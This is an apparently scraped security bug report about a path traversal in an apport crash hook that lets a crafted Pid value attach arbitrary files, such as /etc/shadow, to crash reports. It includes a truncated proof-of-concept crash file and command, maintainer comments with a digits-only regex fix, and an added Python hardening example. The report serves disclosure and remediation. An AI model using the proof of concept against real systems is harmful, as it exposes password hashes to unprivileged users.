Path traversal leads to arbitrary file read
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| Apport | Fix Released | Critical | Unassigned | |
| apport (Ubuntu) | Fix Released | Undecided | Unassigned | |
| openjdk-13 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| openjdk-14 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| openjdk-15 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| openjdk-16 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| openjdk-17 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| openjdk-18 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| openjdk-8 (Ubuntu) | Won't Fix | Undecided | Unassigned | |
| xorg (Ubuntu) | Won't Fix | Undecided | Unassigned | |
Bug Description
While reiterating the issues reported in https:/
The following excerpt of the file `package-
if True or report.
compiz_pid = 0
pid_line = re.search(
if pid_line:
compiz_pid = pid_line.
compiz_
attach_
While in [0] the `pid_line` is extracted, this value (if successfully matched) is appended to the file path resulting in `compiz_state_file` [1], which is subsequently attached to the crash file.
Using a `Pid` such as `JRN/..
The following POC (tested on 20.04/21.04 Desktop) exploits this issue to read the file `/etc/shadow`:
mkdir /tmp/compiz_
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:$pid
Uid:$pid
EOF
When reading the crash file (after `whoopsie-
grep -A3 compiz_internal /var/crash/
compiz_
root:!
daemon:
bin:*:
Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.
Best regards,
Maik
information type: Private Security → Public Security
tags: added: patch
Changed in openjdk-13 (Ubuntu): status: New → Won't Fix
Changed in openjdk-14 (Ubuntu): status: New → Won't Fix
Changed in openjdk-15 (Ubuntu): status: New → Won't Fix
Changed in openjdk-16 (Ubuntu): status: New → Won't Fix
Changed in openjdk-17 (Ubuntu): status: New → Won't Fix
Changed in openjdk-18 (Ubuntu): status: New → Won't Fix
Changed in openjdk-8 (Ubuntu): status: New → Won't Fix
Changed in xorg (Ubuntu): status: New → Won't Fix
Changed in apport: importance: Undecided → Critical
Changed in apport: milestone: none → 2.21.0
Changed in apport: status: New → Fix Released
Thanks for reporting this issue - this file comes from the xserver-xorg source package so I am adding that as an affected package - I also see there is a similar pattern in apport/ui.py itself, plus the openjdk source packages all have similar logic there too and would likely be affected as well.
In this case it could easily be handled by changing these scripts to be more strict when parsing out the Pid, as follows:
pid_line = re.search("Pid:\t([0-9]+)\n", report["ProcStatus"])
I'll look at constructing patches based on this approach.
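As an added illustration (not code from the report, from apport, or from the xserver-xorg package), the following Python script contrasts a loose Pid parse with the digits-only pattern proposed in the comment above, and adds a containment check on the resulting path as defence in depth. The base directory `BASE_DIR`, the loose regex in `parse_pid_lenient`, and the two sample `ProcStatus` strings are constructed assumptions, not values taken from the page.

```python
import os
import re

# Constructed samples of a crash report's ProcStatus field. The second one
# carries a Pid value of the kind the report describes; both are made up here.
BENIGN_STATUS = "Name:\tcompiz\nPid:\t12345\nUid:\t1000\n"
TRAVERSAL_STATUS = "Name:\tcompiz\nPid:\t../../etc/shadow\nUid:\t1000\n"

# Assumed base directory for the per-PID state file (hypothetical placeholder).
BASE_DIR = "/tmp/compiz_state"


def parse_pid_lenient(proc_status):
    """Loose parse standing in for the permissive pattern the report refers to
    (assumed here): it accepts anything after 'Pid:' up to end of line, so a
    value containing path separators is returned unchanged."""
    m = re.search(r"Pid:\t(.*)\n", proc_status)
    return m.group(1) if m else None


def parse_pid_strict(proc_status):
    """Digits-only parse as proposed in the comment above; any Pid value that
    is not purely numeric fails to match and yields None."""
    m = re.search(r"Pid:\t([0-9]+)\n", proc_status)
    return m.group(1) if m else None


def state_file_path(pid, base=BASE_DIR):
    """Build the per-PID state file path by plain concatenation, which is what
    makes an unvalidated Pid dangerous: '..' segments are not neutralised."""
    return base + "/" + pid


def is_contained(path, base=BASE_DIR):
    """Defence in depth: resolve the candidate path and check that it still
    lies under base, so traversal is caught even if the parse is loosened
    again later."""
    real_base = os.path.realpath(base)
    real_path = os.path.realpath(path)
    return os.path.commonpath([real_base, real_path]) == real_base


def resolve_state_file(proc_status, base=BASE_DIR):
    """Hardened flow: strict parse first, then containment check, and only
    then hand the path to whatever attaches or opens the file.
    Returns None whenever either check fails."""
    pid = parse_pid_strict(proc_status)
    if pid is None:
        return None
    path = state_file_path(pid, base)
    if not is_contained(path, base):
        return None
    return path


if __name__ == "__main__":
    for label, status in (("benign", BENIGN_STATUS), ("traversal", TRAVERSAL_STATUS)):
        loose = parse_pid_lenient(status)
        contained = is_contained(state_file_path(loose)) if loose else None
        print(f"{label}: lenient pid={loose!r} -> contained={contained}")
        print(f"{label}: hardened path={resolve_state_file(status)!r}")
```

The strict regex alone is what the comment proposes and is sufficient for this bug; the `is_contained` check is a second, independent barrier so that a future change to the parser cannot silently reopen the traversal.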